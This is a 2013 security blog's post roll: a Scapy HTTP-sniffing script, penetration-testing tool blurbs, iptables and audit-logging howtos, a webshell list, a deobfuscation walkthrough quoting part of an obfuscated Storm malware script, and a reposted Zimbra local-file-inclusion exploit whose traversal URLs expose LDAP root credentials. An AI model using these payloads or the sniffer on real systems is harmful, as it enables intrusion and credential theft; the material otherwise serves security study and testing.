Dec 21, 2013

Simple Sniffing HTTP With Python Scapy

#!/usr/bin/env python

from scapy.all import *
from scapy.error import Scapy_Exception

m_iface="wlan0"
filter_message="http"
count=0

def pktTCP(pkt):
        global count
        if pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80 and pkt.haslayer(Raw):
                count=count+1
                print pkt.getlayer(Raw).load

sniff(iface=m_iface,prn=pktTCP)


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 20, 2013

Tools: Watcher - passive Web-security scanner

Watcher is a Fiddler addon which aims to assist penetration testers in passively finding Web-application vulnerabilities. The security field today has several good choices for HTTP proxies which assist auditors and pen-testers. We chose to implement this as a plugin for Fiddler which already provides the proxy framework for HTTP debugging. 

Source: http://websecuritytool.codeplex.com/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 19, 2013

Exploit Repository

Repository name
URL
Bugtraq SecurityFocus http://www.securityfocus.com
OSVDB Vulnerabilities http://osvdb.org
Packet Storm http://www.packetstormsecurity.org
VUPEN Security http://www.vupen.com
National Vulnerability Database http://nvd.nist.gov
ISS X-Force http://xforce.iss.net
SecuriTeam http://www.securiteam.com
Government Security http://www.governmentsecurity.org
US-CERT Vulnerability Notes http://www.kb.cert.org/vuls
BugReport http://www.bugreport.ir
Secunia http://secunia.com/advisories/historic/
Offensive Security Exploits Database http://www.exploit-db.com
Security Vulnerabilities Database http://securityvulns.com

Source: http://resources.infosecinstitute.com/mechanics-metasploit/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: macof - flood a switched LAN with random MAC addresses

macof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). A straight C port of the original Perl Net::RawIP macof program by Ian Vitek <ian.vitek@infosec.se>.  


Source: http://www.irongeek.com/i.php?page=backtrack-3-man/macof

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 18, 2013

Tools: BTS PenTesting Lab

BTS PenTesting Lab is a vulnerable web application that helps you in learning basic to advanced vulnerability types. The App is still in Beta version(v0.2).
Currently, the app allows you to learn the following vulnerability types:
SQL Injection
XSS
CSRF
Clickjacking
SSRF
File Inclusion
Command Execution
I am trying to bring some advanced vulnerability types and advanced techniques. Hopefully, you can see in next update :)
The app is developed by Sabari Selvan, a security researcher at Cyber Security Privacy Foundation(cysecurity.org) 

Source: http://code.google.com/p/bts-pentesting-lab/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 17, 2013

Howto: Monitor all shell command and send to syslog server

1. auditctl -a exit,always -w /path/to/file
(Send log to /var/log/audit/audit.log)
 
 
2. Edit /etc/bashrc and modify or add to the end of file
PROMPT_COMMAND='history -a >(logger -t "$USER[$$] $SSH_CONNECTION")'



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Deny direct access to port and allow only forward port.

User must connect with 60050 port to ssh server even server(destination) have ssh binding at port 22.


// For mark traffic
iptables -t mangle -A PREROUTING -p tcp -m tcp --dport 22 -j MARK --set-mark 0x1
// drop traffic that was marked
iptables -A INPUT -m mark --mark 0x1 -j DROP

forward from port 60050 to 22
iptables -t nat -A PREROUTING -i eth0 -p tcp -m tcp --dport 60050 -j REDIRECT --to-ports 22
itpables -A INPUT -p tcp -m tcp --dport 60050 -m state --state NEW -j ACCEPT
itpables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT

 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Automatic redirect outbound traffic from original port to custom port

iptables -t nat -A OUTPUT -d target -p tcp -m tcp --dport 22 -j DNAT --to-destination target:65500
iptables -t nat -A OUTPUT -d 1.1.1.1 -p tcp -m tcp --dport 22 -j DNAT --to-destination
1.1.1.1:65500
 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Batch Script For Check Host Alive

Sample batch script

@setlocal enableextensions enabledelayedexpansion
@echo off
set ipaddr=%1
set oldstate=neither
:loop
set state=down
for /f "tokens=5,7" %%a in ('ping -n 1 !ipaddr!') do (
    if "x%%a"=="xReceived" if "x%%b"=="x1," set state=up
)
if not !state!==!oldstate! (
    echo.Link is !state!
    set oldstate=!state!
)
ping -n 2 127.0.0.1 >nul: 2>nul:
goto :loop
endlocal

 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 16, 2013

Article: Anonymous ด้วย i2p Procotol

 บทความนี้เป็นบทความที่ผมเขียนขึ้น หลังจากอ่านข่าวเรื่อง Malware ของรัสเซียที่ชื่อ i2ninja ครับ ซึ่งความพิเศษตรงที่ i2ninja นั้นใช้งาน i2p เพื่อหลบซ่อนจากการตรวจจับ จึงได้ลองศึกษาแล้วเขียนเป็นบทความนี้ขึ้นมาครับ เชิญรับชมได้เลย :)

https://www.dropbox.com/s/fmc15kgdf5npp3x/Anonymous%20%E0%B8%94%E0%B9%89%E0%B8%A7%E0%B8%A2%20I2P.pdf


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Wifitap - WLAN Traffic Injection Tool

"Wifitap is a proof of concept for communication over WLAN networks using traffic injection.  Wifitap allows direct communication with an associated station to a given access point directly, whilst not being being associated ourselves or being handled by access point." -http://sid.rstack.org





If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 15, 2013

Tools: Webshell Collection

Pentestmonkey’s REVERSE php shell:

b374k-shell (PHP):


AJAX Shell:

Weevely Shell:

The fuzzdb backdoor collection:

The laudanum set of injectable code:
htshells by wireghoul:
a collection of malware type shells (use at own risk):



Source: http://www.securityaegis.com/web-shells-for-all/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Rhino - Java Script Deobfuscate Tool

Rhino is an open-source implementation of JavaScript written entirely in Java. It is typically embedded into Java applications to provide scripting to end users. It is embedded in J2SE 6 as the default Java scripting engine.
Rhino-debugger is a Graphical User Interface (GUI) that enables to debug JavaScript. It is convenient to malware analysts to deobfuscate JavaScript.
Installation
$ sudo aptitude install rhino
Usage
Usage: rhino-debugger script.js
Example
Obfuscated JavaScript
Let's deobfuscate a JavaScript:
$ cat /data/tmp/malwares/storm.js
function xor_str(plain_str, xor_key){ var xored_str = "";
for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));
 return xored_str; } var plain_str = "\x94\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe
[SNIP]
\xdb\xc3\x9c\x84\x9d\x8f\x94\xc9\xbe\xbe\xc9\xbe\xbe\xc7\xc0\xd5\xc6\xc0\x9c\x9d\x8f\xbe";
var xored_str = xor_str(plain_str, 180);
document.write(xored_str);
It's important that you set appropriate line breaks where you will put your breakpoints because breakpoints are applied on a given line.
Start Rhino JavaScript Debugger

Now, let's start Rhino JavaScript Debugger:
$ rhino-debugger /data/tmp/malwares/storm.js &

 


Source: http://www.aldeid.com/wiki/Rhino


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Zimbra 0day exploit / Privilegie escalation via LFI

# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical

# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip

---------------Description-----------------

This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privlegies
and gain acces to the Administration Console.

LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../.
./../../opt/zimbra/conf/localconfig.xml

Example :

https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&
skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml

or

https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=
091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml

  


Source: http://cxsecurity.com/issue/WLB-2013120097


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |